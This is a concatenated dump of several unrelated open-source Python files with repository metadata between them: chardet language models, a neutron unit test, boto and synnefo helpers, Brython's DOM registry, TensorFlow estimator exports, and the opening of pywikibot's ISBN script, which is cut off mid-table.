2,0,2,0,0,1,0,3,2,1,2,1,2,2,0,1,0,0,0,2,1,0,0,2,1,1,1,1,0,2,0,2,
2,1,1,1,1,1,1,1,1,1,1,1,1,2,1,0,1,1,1,1,0,0,0,1,1,1,1,0,1,0,0,1,
1,2,2,2,2,1,0,0,1,0,0,0,0,0,2,0,1,1,1,1,0,0,0,0,1,0,1,2,0,0,2,0,
1,0,1,1,1,2,1,0,1,0,1,1,0,0,1,0,1,1,1,0,1,0,0,0,1,0,0,1,0,1,1,0,
2,1,2,2,2,0,3,0,1,1,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
0,0,0,1,1,1,0,0,1,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,
1,2,2,3,2,2,0,0,1,1,2,0,1,2,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,
0,1,1,0,0,1,1,0,0,1,1,0,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,
2,2,1,1,2,1,2,2,2,2,2,1,2,2,0,1,0,0,0,1,2,2,2,1,2,1,1,1,1,1,2,1,
1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,0,0,1,1,1,0,1,1,0,0,1,
1,2,2,2,2,0,1,0,2,2,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,
0,0,1,0,0,1,0,0,0,0,1,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,0,0,2,2,2,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,
0,1,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,0,0,0,1,0,0,1,1,2,0,0,0,0,1,0,1,0,0,1,0,0,2,0,0,0,1,
0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,1,1,2,0,2,1,1,1,1,0,2,2,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,1,
0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
1,0,2,1,2,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,
0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,
1,0,0,0,0,2,0,1,2,1,0,1,1,1,0,1,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,1,
0,0,0,0,0,1,0,0,1,1,0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,
2,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
1,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
1,1,1,0,1,0,1,0,0,1,1,1,1,0,0,0,1,0,0,0,0,1,0,0,0,1,0,1,0,0,0,0,
1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
1,1,0,1,1,0,1,0,1,0,0,0,0,1,1,0,1,1,0,0,0,0,0,1,0,1,1,0,1,0,0,0,
0,1,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,
)
Koi8rModel = {
'charToOrderMap': KOI8R_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "KOI8-R"
}
Win1251CyrillicModel = {
'charToOrderMap': win1251_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "windows-1251"
}
Latin5CyrillicModel = {
'charToOrderMap': latin5_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "ISO-8859-5"
}
MacCyrillicModel = {
'charToOrderMap': macCyrillic_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "MacCyrillic"
}
Ibm866Model = {
'charToOrderMap': IBM866_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "IBM866"
}
Ibm855Model = {
'charToOrderMap': IBM855_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "IBM855"
}
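# Usage sketch (mirrors chardet's sbcsgroupprober wiring; import path is for
# the chardet 2.x bundled here):
#   from chardet.sbcharsetprober import SingleByteCharSetProber
#   prober = SingleByteCharSetProber(Win1251CyrillicModel)
#   prober.feed(some_bytes)  # some_bytes: raw text to classify (assumed)
#   print(prober.get_confidence())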
# flake8: noqa
|
gpl-3.0
|
sasukeh/neutron
|
neutron/tests/unit/plugins/oneconvergence/test_plugin_helper.py
|
43
|
2504
|
# Copyright 2014 OneConvergence, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_serialization import jsonutils
import requests
from neutron.plugins.oneconvergence.lib import config # noqa
from neutron.plugins.oneconvergence.lib import plugin_helper as client
from neutron.tests import base
class TestPluginHelper(base.BaseTestCase):
def setUp(self):
super(TestPluginHelper, self).setUp()
self.nvsdcontroller = client.NVSDController()
def get_response(self, *args, **kwargs):
response = mock.Mock()
response.status_code = requests.codes.ok
response.content = jsonutils.dumps({'session_uuid': 'new_auth_token'})
return response
def test_login(self):
login_url = ('http://127.0.0.1:8082/pluginhandler/ocplugin/'
'authmgmt/login')
headers = {'Content-Type': 'application/json'}
data = jsonutils.dumps({"user_name": "ocplugin", "passwd": "oc123"})
timeout = 30.0
with mock.patch.object(self.nvsdcontroller.pool, 'request',
side_effect=self.get_response) as request:
self.nvsdcontroller.login()
request.assert_called_once_with('POST', url=login_url,
headers=headers, data=data,
timeout=timeout)
def test_request(self):
with mock.patch.object(self.nvsdcontroller.pool, 'request',
side_effect=self.get_response) as request:
self.nvsdcontroller.login()
self.nvsdcontroller.request("POST", "/some_url")
self.assertEqual(request.call_count, 2)
request.assert_called_with(
'POST',
url='http://127.0.0.1:8082/some_url?authToken=new_auth_token',
headers={'Content-Type': 'application/json'}, data='',
timeout=30.0)
|
apache-2.0
|
harshilasu/LinkurApp
|
y/google-cloud-sdk/platform/gsutil/third_party/boto/boto/file/bucket.py
|
97
|
4075
|
# Copyright 2010 Google Inc.
# Copyright (c) 2011, Nexenta Systems Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# File representation of bucket, for use with "file://" URIs.
import os
from boto.file.key import Key
from boto.file.simpleresultset import SimpleResultSet
from boto.s3.bucketlistresultset import BucketListResultSet
class Bucket(object):
def __init__(self, name, contained_key):
"""Instantiate an anonymous file-based Bucket around a single key.
"""
self.name = name
self.contained_key = contained_key
def __iter__(self):
return iter(BucketListResultSet(self))
def __str__(self):
return 'anonymous bucket for file://' + self.contained_key
def delete_key(self, key_name, headers=None,
version_id=None, mfa_token=None):
"""
Deletes a key from the bucket.
:type key_name: string
:param key_name: The key name to delete
:type version_id: string
:param version_id: Unused in this subclass.
:type mfa_token: tuple or list of strings
:param mfa_token: Unused in this subclass.
"""
os.remove(key_name)
def get_all_keys(self, headers=None, **params):
"""
This method returns the single key around which this anonymous Bucket
was instantiated.
:rtype: SimpleResultSet
:return: The result from file system listing the keys requested
"""
key = Key(self.name, self.contained_key)
return SimpleResultSet([key])
def get_key(self, key_name, headers=None, version_id=None,
key_type=Key.KEY_REGULAR_FILE):
"""
Check to see if a particular key exists within the bucket.
Returns: An instance of a Key object or None
:type key_name: string
:param key_name: The name of the key to retrieve
:type version_id: string
:param version_id: Unused in this subclass.
:type key_type: integer
:param key_type: Type of the Key - Regular File or input/output Stream
:rtype: :class:`boto.file.key.Key`
:returns: A Key object from this bucket.
"""
if key_name == '-':
return Key(self.name, '-', key_type=Key.KEY_STREAM_READABLE)
else:
fp = open(key_name, 'rb')
return Key(self.name, key_name, fp)
def new_key(self, key_name=None, key_type=Key.KEY_REGULAR_FILE):
"""
Creates a new key
:type key_name: string
:param key_name: The name of the key to create
:rtype: :class:`boto.file.key.Key`
:returns: An instance of the newly created key object
"""
if key_name == '-':
return Key(self.name, '-', key_type=Key.KEY_STREAM_WRITABLE)
else:
dir_name = os.path.dirname(key_name)
if dir_name and not os.path.exists(dir_name):
os.makedirs(dir_name)
fp = open(key_name, 'wb')
return Key(self.name, key_name, fp)
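# Usage sketch (illustrative local paths): the bucket wraps plain files, so
#   bucket = Bucket('local', '/tmp/data.txt')
#   key = bucket.new_key('/tmp/data.txt')  # opens /tmp/data.txt for writing
#   key = bucket.get_key('/tmp/data.txt')  # reopens it for reading
#   bucket.delete_key('/tmp/data.txt')     # os.remove() under the hood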
|
gpl-3.0
|
apyrgio/synnefo
|
snf-cyclades-app/synnefo/volume/util.py
|
6
|
4183
|
# Copyright (C) 2010-2014 GRNET S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from synnefo.db import models
from snf_django.lib.api import faults
from synnefo.api.util import get_image_dict, get_vm
from synnefo.plankton import backend
from synnefo.cyclades_settings import cyclades_services, BASE_HOST
from synnefo.lib import join_urls
from synnefo.lib.services import get_service_path
def get_volume(user_id, volume_id, for_update=False,
non_deleted=False,
exception=faults.ItemNotFound):
volumes = models.Volume.objects
if for_update:
volumes = volumes.select_for_update()
try:
volume_id = int(volume_id)
except (TypeError, ValueError):
raise faults.BadRequest("Invalid volume id: %s" % volume_id)
try:
volume = volumes.get(id=volume_id, userid=user_id)
if non_deleted and volume.deleted:
raise faults.BadRequest("Volume '%s' has been deleted."
% volume_id)
return volume
except models.Volume.DoesNotExist:
raise exception("Volume %s not found" % volume_id)
def get_volume_type(volume_type_id, for_update=False, include_deleted=False,
exception=faults.ItemNotFound):
vtypes = models.VolumeType.objects
if not include_deleted:
vtypes = vtypes.filter(deleted=False)
if for_update:
vtypes = vtypes.select_for_update()
try:
vtype_id = int(volume_type_id)
except (TypeError, ValueError):
raise faults.BadRequest("Invalid volume id: %s" % volume_type_id)
try:
return vtypes.get(id=vtype_id)
except models.VolumeType.DoesNotExist:
raise exception("Volume type %s not found" % vtype_id)
def get_snapshot(user_id, snapshot_id, exception=faults.ItemNotFound):
try:
with backend.PlanktonBackend(user_id) as b:
return b.get_snapshot(snapshot_id)
except faults.ItemNotFound:
raise exception("Snapshot %s not found" % snapshot_id)
def get_image(user_id, image_id, exception=faults.ItemNotFound):
try:
return get_image_dict(image_id, user_id)
except faults.ItemNotFound:
raise exception("Image %s not found" % image_id)
def get_server(user_id, server_id, for_update=False, non_deleted=False,
exception=faults.ItemNotFound):
try:
server_id = int(server_id)
except (TypeError, ValueError):
raise faults.BadRequest("Invalid server id: %s" % server_id)
try:
return get_vm(server_id, user_id, for_update=for_update,
non_deleted=non_deleted, non_suspended=True)
except faults.ItemNotFound:
raise exception("Server %s not found" % server_id)
VOLUME_URL = \
join_urls(BASE_HOST,
get_service_path(cyclades_services, "volume", version="v2.0"))
VOLUMES_URL = join_urls(VOLUME_URL, "volumes/")
SNAPSHOTS_URL = join_urls(VOLUME_URL, "snapshots/")
def volume_to_links(volume_id):
href = join_urls(VOLUMES_URL, str(volume_id))
return [{"rel": rel, "href": href} for rel in ("self", "bookmark")]
def snapshot_to_links(snapshot_id):
href = join_urls(SNAPSHOTS_URL, str(snapshot_id))
return [{"rel": rel, "href": href} for rel in ("self", "bookmark")]
def update_snapshot_state(snapshot_id, user_id, state):
"""Update the state of a snapshot in Pithos.
Use PithosBackend in order to update the state of the snapshots in
Pithos DB.
"""
with backend.PlanktonBackend(user_id) as b:
return b.update_snapshot_state(snapshot_id, state=state)
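# Usage sketch: API views resolve user-supplied identifiers through these
# helpers (variable names assumed), e.g.
#   volume = get_volume(user_id, volume_id, for_update=True, non_deleted=True)
#   links = volume_to_links(volume.id)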
|
gpl-3.0
|
40223136/w17test2
|
static/Brython3.1.0-20150301-090019/Lib/xml/dom/domreg.py
|
841
|
3402
|
"""Registration facilities for DOM. This module should not be used
directly. Instead, the functions getDOMImplementation and
registerDOMImplementation should be imported from xml.dom."""
# This is a list of well-known implementations. Well-known names
# should be published by posting to [email protected], and are
# subsequently recorded in this file.
well_known_implementations = {
'minidom':'xml.dom.minidom',
'4DOM': 'xml.dom.DOMImplementation',
}
# DOM implementations not officially registered should register
# themselves with their name via registerDOMImplementation().
registered = {}
def registerDOMImplementation(name, factory):
"""registerDOMImplementation(name, factory)
Register the factory function with the name. The factory function
should return an object which implements the DOMImplementation
interface. The factory function can either return the same object,
or a new one (e.g. if that implementation supports some
customization)."""
registered[name] = factory
def _good_enough(dom, features):
"_good_enough(dom, features) -> Return 1 if the dom offers the features"
for f,v in features:
if not dom.hasFeature(f,v):
return 0
return 1
def getDOMImplementation(name=None, features=()):
"""getDOMImplementation(name = None, features = ()) -> DOM implementation.
Return a suitable DOM implementation. The name is either
well-known, the module name of a DOM implementation, or None. If
it is not None, imports the corresponding module and returns a
DOMImplementation object if the import succeeds.
If name is not given, consider the available implementations to
find one with the required feature set. If no implementation can
be found, raise an ImportError. The features list must be a sequence
of (feature, version) pairs which are passed to hasFeature."""
import os
creator = None
mod = well_known_implementations.get(name)
if mod:
mod = __import__(mod, {}, {}, ['getDOMImplementation'])
return mod.getDOMImplementation()
elif name:
return registered[name]()
elif "PYTHON_DOM" in os.environ:
return getDOMImplementation(name = os.environ["PYTHON_DOM"])
# User did not specify a name, try implementations in arbitrary
# order, returning the one that has the required features
if isinstance(features, str):
features = _parse_feature_string(features)
for creator in registered.values():
dom = creator()
if _good_enough(dom, features):
return dom
for creator in well_known_implementations.keys():
try:
dom = getDOMImplementation(name = creator)
except Exception: # typically ImportError, or AttributeError
continue
if _good_enough(dom, features):
return dom
raise ImportError("no suitable DOM implementation found")
def _parse_feature_string(s):
features = []
parts = s.split()
i = 0
length = len(parts)
while i < length:
feature = parts[i]
if feature[0] in "0123456789":
raise ValueError("bad feature name: %r" % (feature,))
i = i + 1
version = None
if i < length:
v = parts[i]
if v[0] in "0123456789":
i = i + 1
version = v
features.append((feature, version))
return tuple(features)
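# Usage sketch (via the public xml.dom entry point):
#   from xml.dom import getDOMImplementation
#   impl = getDOMImplementation('minidom')
#   doc = impl.createDocument(None, 'root', None)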
|
gpl-3.0
|
horance-liu/tensorflow
|
tensorflow/python/estimator/estimator_lib.py
|
13
|
3243
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Estimator: High level tools for working with models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,line-too-long,wildcard-import
from tensorflow.python.estimator.canned.baseline import BaselineClassifier
from tensorflow.python.estimator.canned.baseline import BaselineRegressor
from tensorflow.python.estimator.canned.dnn import DNNClassifier
from tensorflow.python.estimator.canned.dnn import DNNRegressor
from tensorflow.python.estimator.canned.dnn_linear_combined import DNNLinearCombinedClassifier
from tensorflow.python.estimator.canned.dnn_linear_combined import DNNLinearCombinedRegressor
from tensorflow.python.estimator.canned.linear import LinearClassifier
from tensorflow.python.estimator.canned.linear import LinearRegressor
from tensorflow.python.estimator.canned.parsing_utils import classifier_parse_example_spec
from tensorflow.python.estimator.canned.parsing_utils import regressor_parse_example_spec
from tensorflow.python.estimator.estimator import Estimator
from tensorflow.python.estimator.export import export_lib as export
from tensorflow.python.estimator.exporter import Exporter
from tensorflow.python.estimator.exporter import FinalExporter
from tensorflow.python.estimator.exporter import LatestExporter
from tensorflow.python.estimator.inputs import inputs
from tensorflow.python.estimator.model_fn import EstimatorSpec
from tensorflow.python.estimator.model_fn import ModeKeys
from tensorflow.python.estimator.run_config import RunConfig
from tensorflow.python.estimator.training import EvalSpec
from tensorflow.python.estimator.training import train_and_evaluate
from tensorflow.python.estimator.training import TrainSpec
from tensorflow.python.util.all_util import remove_undocumented
# pylint: enable=unused-import,line-too-long,wildcard-import
_allowed_symbols = [
# Canned Estimators
'BaselineClassifier',
'BaselineRegressor',
'DNNClassifier',
'DNNRegressor',
'DNNLinearCombinedClassifier',
'DNNLinearCombinedRegressor',
'LinearClassifier',
'LinearRegressor',
# I/O
'classifier_parse_example_spec',
'regressor_parse_example_spec',
'inputs',
'export',
# Estimator
'Estimator',
'EstimatorSpec',
'ModeKeys',
'RunConfig',
# Training utilities
'train_and_evaluate',
'EvalSpec',
'TrainSpec',
'Exporter',
'LatestExporter',
'FinalExporter',
]
remove_undocumented(__name__, allowed_exception_list=_allowed_symbols)
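# Illustrative sketch of how the re-exported API above fits together; the
# model_fn and input functions are hypothetical placeholders, not part of
# this module:
#
#     estimator = Estimator(model_fn=my_model_fn, config=RunConfig())
#     train_and_evaluate(estimator,
#                        TrainSpec(input_fn=train_input_fn, max_steps=1000),
#                        EvalSpec(input_fn=eval_input_fn))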
|
apache-2.0
|
magul/pywikibot-core
|
scripts/isbn.py
|
1
|
42218
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This script reports and fixes invalid ISBN numbers.
Additionally, it can convert all ISBN-10 codes to the ISBN-13 format, and
correct the ISBN format by placing hyphens.
These command line parameters can be used to specify which pages to work on:
¶ms;
Furthermore, the following command line parameters are supported:
-to13 Converts all ISBN-10 codes to ISBN-13.
NOTE: This needn't be done, as MediaWiki still supports
(and will keep supporting) ISBN-10, and all libraries and
bookstores will most likely do so as well.
-format Corrects the hyphenation.
                  NOTE: This is in here for testing purposes only. Usually
                  it's not worth creating an edit for such a minor issue.
The recommended way of doing this is enabling
cosmetic_changes, so that these changes are made on-the-fly
to all pages that are modified.
-always Don't prompt you for each replacement.
-prop-isbn-10     Sets the ISBN-10 property ID so the script does not try
                  to find it automatically.
The usage is as follows: -prop-isbn-10:propid
-prop-isbn-13 Sets ISBN-13 property ID. The format and purpose is the
same as in -prop-isbn-10.
"""
#
# (C) Pywikibot team, 2009-2017
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, unicode_literals
import re
from functools import partial
import pywikibot
from pywikibot import i18n, pagegenerators, textlib, Bot, WikidataBot
try:
import stdnum.isbn
except ImportError:
try:
import isbnlib
except ImportError:
pass
try:
import isbn_hyphenate
except ImportError:
pass
docuReplacements = {
'¶ms;': pagegenerators.parameterHelp,
}
# Maps each group number to the list of its publisher number ranges. Taken from:
# https://web.archive.org/web/20090823122028/http://www.isbn-international.org/converter/ranges.htm
ranges = {
'0': [ # English speaking area
('00', '19'),
('200', '699'),
('7000', '8499'),
('85000', '89999'),
('900000', '949999'),
('9500000', '9999999'),
],
'1': [ # English speaking area
('00', '09'),
('100', '399'),
('4000', '5499'),
('55000', '86979'),
('869800', '998999'),
],
'2': [ # French speaking area
('00', '19'),
('200', '349'),
('35000', '39999'),
('400', '699'),
('7000', '8399'),
('84000', '89999'),
('900000', '949999'),
('9500000', '9999999'),
],
'3': [ # German speaking area
('00', '02'),
('030', '033'),
('0340', '0369'),
('03700', '03999'),
('04', '19'),
('200', '699'),
('7000', '8499'),
('85000', '89999'),
('900000', '949999'),
('9500000', '9999999'),
],
'4': [ # Japan
('00', '19'),
('200', '699'),
('7000', '8499'),
('85000', '89999'),
('900000', '949999'),
('9500000', '9999999'),
],
'5': [ # Russian Federation
('00', '19'),
('200', '699'),
('7000', '8499'),
('85000', '89999'),
('900000', '909999'),
('91000', '91999'),
('9200', '9299'),
('93000', '94999'),
('9500', '9799'),
('98000', '98999'),
('9900000', '9909999'),
('9910', '9999'),
],
'600': [ # Iran
('00', '09'),
('100', '499'),
('5000', '8999'),
('90000', '99999'),
],
'601': [ # Kazakhstan
('00', '19'),
('200', '699'),
('7000', '7999'),
('80000', '84999'),
('85', '99'),
],
'602': [ # Indonesia
('00', '19'),
('200', '799'),
('8000', '9499'),
('95000', '99999'),
],
'603': [ # Saudi Arabia
('00', '04'),
('500', '799'),
('8000', '8999'),
('90000', '99999'),
],
'604': [ # Vietnam
('0', '4'),
('50', '89'),
('900', '979'),
('9800', '9999'),
],
'605': [ # Turkey
('00', '09'),
('100', '399'),
('4000', '5999'),
('60000', '89999'),
],
'7': [ # China, People's Republic
('00', '09'),
('100', '499'),
('5000', '7999'),
('80000', '89999'),
('900000', '999999'),
],
'80': [ # Czech Republic; Slovakia
('00', '19'),
('200', '699'),
('7000', '8499'),
('85000', '89999'),
('900000', '999999'),
],
'81': [ # India
('00', '19'),
('200', '699'),
('7000', '8499'),
('85000', '89999'),
('900000', '999999'),
],
'82': [ # Norway
('00', '19'),
('200', '699'),
('7000', '8999'),
('90000', '98999'),
('990000', '999999'),
],
'83': [ # Poland
('00', '19'),
('200', '599'),
('60000', '69999'),
('7000', '8499'),
('85000', '89999'),
('900000', '999999'),
],
'84': [ # Spain
('00', '19'),
('200', '699'),
('7000', '8499'),
('85000', '89999'),
('9000', '9199'),
('920000', '923999'),
('92400', '92999'),
('930000', '949999'),
('95000', '96999'),
('9700', '9999'),
],
'85': [ # Brazil
('00', '19'),
('200', '599'),
('60000', '69999'),
('7000', '8499'),
('85000', '89999'),
('900000', '979999'),
('98000', '99999'),
],
'86': [ # Serbia and Montenegro
('00', '29'),
('300', '599'),
('6000', '7999'),
('80000', '89999'),
('900000', '999999'),
],
'87': [ # Denmark
('00', '29'),
('400', '649'),
('7000', '7999'),
('85000', '94999'),
('970000', '999999'),
],
'88': [ # Italian speaking area
('00', '19'),
('200', '599'),
('6000', '8499'),
('85000', '89999'),
('900000', '949999'),
('95000', '99999'),
],
'89': [ # Korea
('00', '24'),
('250', '549'),
('5500', '8499'),
('85000', '94999'),
('950000', '999999'),
],
'90': [ # Netherlands, Belgium (Flemish)
('00', '19'),
('200', '499'),
('5000', '6999'),
('70000', '79999'),
('800000', '849999'),
('8500', '8999'),
('900000', '909999'),
('940000', '949999'),
],
'91': [ # Sweden
('0', '1'),
('20', '49'),
('500', '649'),
('7000', '7999'),
('85000', '94999'),
('970000', '999999'),
],
'92': [ # International Publishers (Unesco, EU), European Community Organizations
('0', '5'),
('60', '79'),
('800', '899'),
('9000', '9499'),
('95000', '98999'),
('990000', '999999'),
],
'93': [ # India - no ranges fixed yet
],
'950': [ # Argentina
('00', '49'),
('500', '899'),
('9000', '9899'),
('99000', '99999'),
],
'951': [ # Finland
('0', '1'),
('20', '54'),
('550', '889'),
('8900', '9499'),
('95000', '99999'),
],
'952': [ # Finland
('00', '19'),
('200', '499'),
('5000', '5999'),
('60', '65'),
('6600', '6699'),
('67000', '69999'),
('7000', '7999'),
('80', '94'),
('9500', '9899'),
('99000', '99999'),
],
'953': [ # Croatia
('0', '0'),
('10', '14'),
('150', '549'),
('55000', '59999'),
('6000', '9499'),
('95000', '99999'),
],
'954': [ # Bulgaria
('00', '29'),
('300', '799'),
('8000', '8999'),
('90000', '92999'),
('9300', '9999'),
],
'955': [ # Sri Lanka
('0', '0'),
('1000', '1999'),
('20', '54'),
('550', '799'),
('8000', '9499'),
('95000', '99999'),
],
'956': [ # Chile
('00', '19'),
('200', '699'),
('7000', '9999'),
],
'957': [ # Taiwan, China
('00', '02'),
('0300', '0499'),
('05', '19'),
('2000', '2099'),
('21', '27'),
('28000', '30999'),
('31', '43'),
('440', '819'),
('8200', '9699'),
('97000', '99999'),
],
'958': [ # Colombia
('00', '59'),
('600', '799'),
('8000', '9499'),
('95000', '99999'),
],
'959': [ # Cuba
('00', '19'),
('200', '699'),
('7000', '8499'),
],
'960': [ # Greece
('00', '19'),
('200', '659'),
('6600', '6899'),
('690', '699'),
('7000', '8499'),
('85000', '99999'),
],
'961': [ # Slovenia
('00', '19'),
('200', '599'),
('6000', '8999'),
('90000', '94999'),
],
'962': [ # Hong Kong
('00', '19'),
('200', '699'),
('7000', '8499'),
('85000', '86999'),
('8700', '8999'),
('900', '999'),
],
'963': [ # Hungary
('00', '19'),
('200', '699'),
('7000', '8499'),
('85000', '89999'),
('9000', '9999'),
],
'964': [ # Iran
('00', '14'),
('150', '249'),
('2500', '2999'),
('300', '549'),
('5500', '8999'),
('90000', '96999'),
('970', '989'),
('9900', '9999'),
],
'965': [ # Israel
('00', '19'),
('200', '599'),
('7000', '7999'),
('90000', '99999'),
],
'966': [ # Ukraine
('00', '19'),
('2000', '2999'),
('300', '699'),
('7000', '8999'),
('90000', '99999'),
],
'967': [ # Malaysia
('00', '29'),
('300', '499'),
('5000', '5999'),
('60', '89'),
('900', '989'),
('9900', '9989'),
('99900', '99999'),
],
'968': [ # Mexico
('01', '39'),
('400', '499'),
('5000', '7999'),
('800', '899'),
('9000', '9999'),
],
'969': [ # Pakistan
('0', '1'),
('20', '39'),
('400', '799'),
('8000', '9999'),
],
'970': [ # Mexico
('01', '59'),
('600', '899'),
('9000', '9099'),
('91000', '96999'),
('9700', '9999'),
],
'971': [ # Philippines?
('000', '019'),
('02', '02'),
('0300', '0599'),
('06', '09'),
('10', '49'),
('500', '849'),
('8500', '9099'),
('91000', '99999'),
],
'972': [ # Portugal
('0', '1'),
('20', '54'),
('550', '799'),
('8000', '9499'),
('95000', '99999'),
],
'973': [ # Romania
('0', '0'),
('100', '169'),
('1700', '1999'),
('20', '54'),
('550', '759'),
('7600', '8499'),
('85000', '88999'),
('8900', '9499'),
('95000', '99999'),
],
'974': [ # Thailand
('00', '19'),
('200', '699'),
('7000', '8499'),
('85000', '89999'),
('90000', '94999'),
('9500', '9999'),
],
'975': [ # Turkey
('00000', '00999'),
('01', '24'),
('250', '599'),
('6000', '9199'),
('92000', '98999'),
('990', '999'),
],
'976': [ # Caribbean Community
('0', '3'),
('40', '59'),
('600', '799'),
('8000', '9499'),
('95000', '99999'),
],
'977': [ # Egypt
('00', '19'),
('200', '499'),
('5000', '6999'),
('700', '999'),
],
'978': [ # Nigeria
('000', '199'),
('2000', '2999'),
('30000', '79999'),
('8000', '8999'),
('900', '999'),
],
'979': [ # Indonesia
('000', '099'),
('1000', '1499'),
('15000', '19999'),
('20', '29'),
('3000', '3999'),
('400', '799'),
('8000', '9499'),
('95000', '99999'),
],
'980': [ # Venezuela
('00', '19'),
('200', '599'),
('6000', '9999'),
],
'981': [ # Singapore
('00', '19'),
('200', '299'),
('3000', '9999'),
],
'982': [ # South Pacific
('00', '09'),
('100', '699'),
('70', '89'),
('9000', '9999'),
],
'983': [ # Malaysia
('00', '01'),
('020', '199'),
('2000', '3999'),
('40000', '44999'),
('45', '49'),
('50', '79'),
('800', '899'),
('9000', '9899'),
('99000', '99999'),
],
'984': [ # Bangladesh
('00', '39'),
('400', '799'),
('8000', '8999'),
('90000', '99999'),
],
'985': [ # Belarus
('00', '39'),
('400', '599'),
('6000', '8999'),
('90000', '99999'),
],
'986': [ # Taiwan, China
('00', '11'),
('120', '559'),
('5600', '7999'),
('80000', '99999'),
],
'987': [ # Argentina
('00', '09'),
('1000', '1999'),
('20000', '29999'),
